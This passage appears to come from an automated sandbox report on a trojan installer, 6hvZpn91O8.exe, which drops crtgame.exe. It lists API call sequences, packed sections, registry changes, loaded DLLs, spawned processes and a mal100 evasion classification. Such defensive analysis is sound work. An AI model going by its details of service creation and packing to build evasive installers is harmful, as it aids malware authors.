                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C3D7596_2_02C3D759
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C37F026_2_02C37F02
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C3DC4D6_2_02C3DC4D
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C5B85F6_2_02C5B85F
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C5B8066_2_02C5B806
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C5BE576_2_02C5BE57
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C5BE1D6_2_02C5BE1D
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: String function: 004458F8 appears 59 times
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: String function: 00405964 appears 110 times
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: String function: 00445628 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: String function: 00408C14 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: String function: 00406ACC appears 39 times
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: String function: 00403400 appears 61 times
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: String function: 00433D30 appears 32 times
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: String function: 004078FC appears 43 times
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: String function: 00457114 appears 70 times
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: String function: 00403494 appears 82 times
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: String function: 004529A4 appears 91 times
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: String function: 00403684 appears 218 times
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: String function: 00456F08 appears 91 times
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: String function: 02C385A0 appears 37 times
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: String function: 02C44DF0 appears 138 times
                  Source: 6hvZpn91O8.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: 6hvZpn91O8.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: 6hvZpn91O8.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                  Source: 6hvZpn91O8.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: 6hvZpn91O8.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: crtgame.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: is-4264D.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: is-4264D.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                  Source: is-4264D.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: is-4264D.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: SpaceXRaces.exe.4.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: is-UMM6D.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-FGLVG.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-S02KC.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-RPUOD.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-2CGLR.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-OJ8GN.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-G7PIK.tmp.1.drStatic PE information: Number of sections : 18 > 10
                  Source: 6hvZpn91O8.exe, 00000000.00000003.1677333051.0000000002148000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs 6hvZpn91O8.exe
                  Source: 6hvZpn91O8.exe, 00000000.00000003.1677127078.0000000002370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs 6hvZpn91O8.exe
                  Source: 6hvZpn91O8.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: crtgame.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: _RegDLL.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: SpaceXRaces.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: is-HASL7.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9964533211297071
                  Source: is-KCF1P.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9976058467741935
                  Source: is-DQCHN.tmp.1.drStatic PE information: Section: ZLIB complexity 0.995148689516129
                  Source: is-BDC3N.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9908203125
                  Source: is-KANF7.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9903624487704918
                  Source: is-OMMAA.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9891526442307692
                  Source: is-58TJN.tmp.1.drBinary or memory string: ?..la..dll.Unknown error %u occurred.sln
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@16/128@1/2
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C302C0 FormatMessageA,GetLastError,FormatMessageA,GetLastError,6_2_02C302C0
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00454B00
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00455328 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455328
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: lstrcmpiW,GetModuleHandleA,GetModuleFileNameA,GetModuleHandleA,GetModuleFileNameW,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,CreateDirectoryA,CopyFileA,OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_00402548
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0046D118 GetVersion,CoCreateInstance,1_2_0046D118
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeCode function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409BEC
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 4_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,ExitProcess,StartServiceCtrlDispatcherA,4_2_004026F0
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 4_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,ExitProcess,StartServiceCtrlDispatcherA,4_2_004026F0
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGameJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2256:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_03
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeMutant created: \Sessions\1\BaseNamedObjects\AnyMediaPlayer
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2044:120:WilError_03
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeFile created: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmpJump to behavior
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: is-G7PIK.tmp.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: is-G7PIK.tmp.1.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                  Source: is-G7PIK.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: is-G7PIK.tmp.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: is-G7PIK.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: is-G7PIK.tmp.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: is-G7PIK.tmp.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: is-G7PIK.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: is-G7PIK.tmp.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: 6hvZpn91O8.exeVirustotal: Detection: 57%
                  Source: 6hvZpn91O8.exeReversingLabs: Detection: 39%
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeFile read: C:\Users\user\Desktop\6hvZpn91O8.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\6hvZpn91O8.exe "C:\Users\user\Desktop\6hvZpn91O8.exe"
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp "C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp" /SL5="$10432,6991381,54272,C:\Users\user\Desktop\6hvZpn91O8.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -i
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -s
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp "C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp" /SL5="$10432,6991381,54272,C:\Users\user\Desktop\6hvZpn91O8.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /QueryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -iJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -sJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10Jump to behavior
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpWindow found: window name: TMainFormJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: 6hvZpn91O8.exeStatic file information: File size 7246011 > 1048576
                  Source: Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-BJBAO.tmp.1.dr
                  Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-HAM7K.tmp.1.dr

                  Data Obfuscation

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeUnpacked PE file: 4.2.crtgame.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.hsave:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeUnpacked PE file: 4.2.crtgame.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,1_2_0044C030
                  Source: initial sampleStatic PE information: section where entry point is pointing to: petite
                  Source: crtgame.exe.1.drStatic PE information: section name: .hsave
                  Source: is-4NPOS.tmp.1.drStatic PE information: section name: /4
                  Source: is-V8IE4.tmp.1.drStatic PE information: section name: /4
                  Source: is-2CG7G.tmp.1.drStatic PE information: section name: /4
                  Source: is-G7PIK.tmp.1.drStatic PE information: section name: /4
                  Source: is-G7PIK.tmp.1.drStatic PE information: section name: /19
                  Source: is-G7PIK.tmp.1.drStatic PE information: section name: /31
                  Source: is-G7PIK.tmp.1.drStatic PE information: section name: /45
                  Source: is-G7PIK.tmp.1.drStatic PE information: section name: /57
                  Source: is-G7PIK.tmp.1.drStatic PE information: section name: /70
                  Source: is-G7PIK.tmp.1.drStatic PE information: section name: /81
                  Source: is-G7PIK.tmp.1.drStatic PE information: section name: /92
                  Source: is-HAM7K.tmp.1.drStatic PE information: section name: .trace
                  Source: is-HAM7K.tmp.1.drStatic PE information: section name: _RDATA
                  Source: is-HAM7K.tmp.1.drStatic PE information: section name: .debug_o
                  Source: is-12J2O.tmp.1.drStatic PE information: section name: /4
                  Source: is-73F5N.tmp.1.drStatic PE information: section name: /4
                  Source: is-849ND.tmp.1.drStatic PE information: section name: /4
                  Source: is-RHF7D.tmp.1.drStatic PE information: section name: /4
                  Source: is-S02KC.tmp.1.drStatic PE information: section name: /4
                  Source: is-FGLVG.tmp.1.drStatic PE information: section name: /4
                  Source: is-2CGLR.tmp.1.drStatic PE information: section name: /4
                  Source: is-UMM6D.tmp.1.drStatic PE information: section name: /4
                  Source: is-7Q436.tmp.1.drStatic PE information: section name: /4
                  Source: is-HASL7.tmp.1.drStatic PE information: section name:
                  Source: is-HASL7.tmp.1.drStatic PE information: section name:
                  Source: is-HASL7.tmp.1.drStatic PE information: section name: petite
                  Source: is-Q2C64.tmp.1.drStatic PE information: section name: /4
                  Source: is-5IVSF.tmp.1.drStatic PE information: section name:
                  Source: is-5IVSF.tmp.1.drStatic PE information: section name:
                  Source: is-5IVSF.tmp.1.drStatic PE information: section name: petite
                  Source: is-IG6J1.tmp.1.drStatic PE information: section name:
                  Source: is-IG6J1.tmp.1.drStatic PE information: section name:
                  Source: is-IG6J1.tmp.1.drStatic PE information: section name: petite
                  Source: is-640V1.tmp.1.drStatic PE information: section name:
                  Source: is-640V1.tmp.1.drStatic PE information: section name: petite
                  Source: is-FJ939.tmp.1.drStatic PE information: section name:
                  Source: is-FJ939.tmp.1.drStatic PE information: section name:
                  Source: is-FJ939.tmp.1.drStatic PE information: section name: petite
                  Source: is-K8VM1.tmp.1.drStatic PE information: section name: /4
                  Source: is-NH7NT.tmp.1.drStatic PE information: section name: .sxdata
                  Source: is-OJ8GN.tmp.1.drStatic PE information: section name: .didata
                  Source: is-KCF1P.tmp.1.drStatic PE information: section name:
                  Source: is-KCF1P.tmp.1.drStatic PE information: section name:
                  Source: is-KCF1P.tmp.1.drStatic PE information: section name: petite
                  Source: is-HS78I.tmp.1.drStatic PE information: section name:
                  Source: is-HS78I.tmp.1.drStatic PE information: section name: petite
                  Source: is-DQCHN.tmp.1.drStatic PE information: section name:
                  Source: is-DQCHN.tmp.1.drStatic PE information: section name:
                  Source: is-DQCHN.tmp.1.drStatic PE information: section name:
                  Source: is-BDC3N.tmp.1.drStatic PE information: section name:
                  Source: is-BDC3N.tmp.1.drStatic PE information: section name:
                  Source: is-BDC3N.tmp.1.drStatic PE information: section name: petite
                  Source: is-65BJ1.tmp.1.drStatic PE information: section name:
                  Source: is-65BJ1.tmp.1.drStatic PE information: section name:
                  Source: is-65BJ1.tmp.1.drStatic PE information: section name:
                  Source: is-ONP9R.tmp.1.drStatic PE information: section name:
                  Source: is-ONP9R.tmp.1.drStatic PE information: section name:
                  Source: is-ONP9R.tmp.1.drStatic PE information: section name: petite
                  Source: is-KANF7.tmp.1.drStatic PE information: section name:
                  Source: is-KANF7.tmp.1.drStatic PE information: section name:
                  Source: is-KANF7.tmp.1.drStatic PE information: section name: petite
                  Source: is-OMMAA.tmp.1.drStatic PE information: section name:
                  Source: is-OMMAA.tmp.1.drStatic PE information: section name:
                  Source: is-OMMAA.tmp.1.drStatic PE information: section name:
                  Source: is-UT0J0.tmp.1.drStatic PE information: section name:
                  Source: is-UT0J0.tmp.1.drStatic PE information: section name:
                  Source: is-UT0J0.tmp.1.drStatic PE information: section name: petite
                  Source: is-NG6SA.tmp.1.drStatic PE information: section name: /4
                  Source: is-2JPEP.tmp.1.drStatic PE information: section name: /4
